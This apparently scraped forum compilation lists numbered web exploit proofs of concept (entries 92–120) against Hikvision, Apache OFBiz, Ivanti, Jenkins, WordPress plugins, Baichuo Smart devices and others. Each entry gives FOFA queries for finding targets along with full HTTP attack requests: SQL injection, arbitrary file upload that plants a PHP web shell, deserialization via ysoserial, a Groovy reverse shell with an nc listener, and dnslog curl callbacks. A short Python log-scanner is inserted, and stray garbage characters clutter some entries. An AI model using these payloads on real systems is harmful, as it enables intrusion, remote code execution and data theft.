Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD
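
As an added defender-side example, not part of the original compilation or of the 网络安全新视界 team's text, the Python below turns the request lines of entries 57 to 92 above into log indicators and runs them over web-server access-log lines. The indicator regexes are this example's own approximations of those requests, the sample log lines and the request body are constructed, and the entry numbers in the labels point back to this section.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Indicators derived from the request lines of the numbered entries above.
# The regexes are this example's own approximations of those requests; they
# run against URL-decoded text, and each label carries the entry number(s).
INDICATORS = [
    ("T+ keyEdit.aspx SQLi (57)",
     re.compile(r"/tplus/UFAQD/keyEdit\.aspx\?.*@@version", re.I)),
    ("Smart platform importexport.php SQLi (60)",
     re.compile(r"/importexport\.php\?.*type=exportexcelbysql", re.I)),
    ("IP-guard flexpaper view.php command injection (62)",
     re.compile(r"/flexpaper/php/view\.php\?.*page=\|\|", re.I)),
    ("IP-guard getdatarecord file read (63)",
     re.compile(r"/downloadFile_client/getdatarecord", re.I)),
    ("ezOFFICE SQLi (66/68/69)",
     re.compile(r"/defaultroot/.*(waitfor\s+delay|union\s+all\s+select)", re.I)),
    ("PM2 Global_UserLogin.aspx SQLi (71)",
     re.compile(r"/Global/Global_UserLogin\.aspx\?.*waitfor\s+delay", re.I)),
    ("Uniview main-cgi credential leak (81)",
     re.compile(r'/cgi-bin/main-cgi\?json=.*"cmd":255', re.I)),
    ("JimuReport testConnection/queryFieldBySql (83/84)",
     re.compile(r"/jmreport/(testConnection|queryFieldBySql)", re.I)),
    ("Freemarker Execute template injection (76/84)",
     re.compile(r"freemarker\.template\.utility\.Execute", re.I)),
    ("Path traversal via /..;/ (91)",
     re.compile(r"/\.\.;/.*fileName=(\.\./)+", re.I)),
]

# Combined-format access-log line (Apache/Nginx), for example:
#   1.2.3.4 - - [05/Jun/2024:14:31:29 +0800] "GET /path HTTP/1.1" 200 512 "-" "UA"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def match_indicators(decoded_text):
    """Labels of every indicator present in already URL-decoded text."""
    return [label for label, rx in INDICATORS if rx.search(decoded_text)]


def scan_body(body):
    """Apply the indicators to a request body captured by a WAF or proxy."""
    return match_indicators(unquote_plus(body))


def scan_log(lines):
    """Parse access-log lines; return the records whose target matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        # Decode once so %27, %20 and '+' encodings cannot hide the pattern.
        labels = match_indicators(unquote_plus(m.group("target")))
        if labels:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": int(m.group("status")),
                         "target": m.group("target"), "labels": labels})
    return hits


def summarize_by_ip(hits):
    """Matched requests per source address, for triage."""
    return dict(Counter(h["ip"] for h in hits))


# Constructed sample log: requests shaped like entries 57, 60, 68, 91 and 83
# plus one benign request. Addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Jun/2024:14:31:29 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" 200 1187 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Jun/2024:14:31:30 +0800] "GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2024:14:31:31 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 331 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2024:14:31:36 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" 200 1420 "-" "Mozilla/5.0"
192.0.2.44 - - [05/Jun/2024:14:31:40 +0800] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.44 - - [05/Jun/2024:14:31:41 +0800] "POST /jmreport/testConnection HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

# Constructed JSON body in the shape of entry 84, reduced to the marker string.
SAMPLE_POST_BODY = '{"sql": "<#assign ex=\\"freemarker.template.utility.Execute\\"?new()>", "type": "0"}'


def scan_sample():
    """Run the scanner over the constructed log above."""
    return scan_log(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for hit in scan_sample():
        print(hit["ts"], hit["ip"], hit["status"], hit["labels"])
    print(summarize_by_ip(scan_sample()))
    print(scan_body(SAMPLE_POST_BODY))
```

Access logs only carry the request line, so the POST-based entries (64, 65, 72, 76, 84, 85, 92 and the multipart uploads) are visible there only by path; their bodies have to come from a WAF or reverse-proxy capture, which is what scan_body takes. The follow-up GET that several entries use to fetch the dropped file (62, 75, 78, 80, 93) is also a cheap confirmation signal: a 200 on an unexpected .txt or .jsp under the web root shortly after one of these hits deserves a look.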
' @4 a; X. f( C5 A! f5 q) H5 P2 q7 d  C  k* {2 Q

93. QiAnXin Wangshen SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast Yingkeshi HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <<ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document; the XML is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close
& ~0 V+ w, n; Y3 j* c- ?$ a4 i* F( r; q% X1 X, h

" F6 {+ @+ u4 |% g9 A8 @" z108. D-Tale 3.9.0 SSRF
9 L- g. O8 m; NCVE-2024-21642
7 @) y$ y' q- nFOFA:"dtale/static/images/favicon.png": R/ `, s5 r" z0 r2 f
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
- D. x, ?) K" D7 }3 nHost: your-ip- h" w1 D$ t, T: ^& Y0 i2 p7 ^% X
Accept: application/json, text/plain, */*( e0 A5 q2 y- H) J( a* ?9 A. H; o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 i4 J! g: m# m5 m+ r' F
Accept-Encoding: gzip, deflate
8 S$ c0 U; H: @3 ^: ZAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
' e1 \' _& y2 q$ O) }* Y9 r) ^Connection: close9 W7 O( R2 O* g) B
; m+ O  W" J1 Z! S( p
" V. G9 _9 I" s6 C# j& F" x
109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthorized administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 - 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

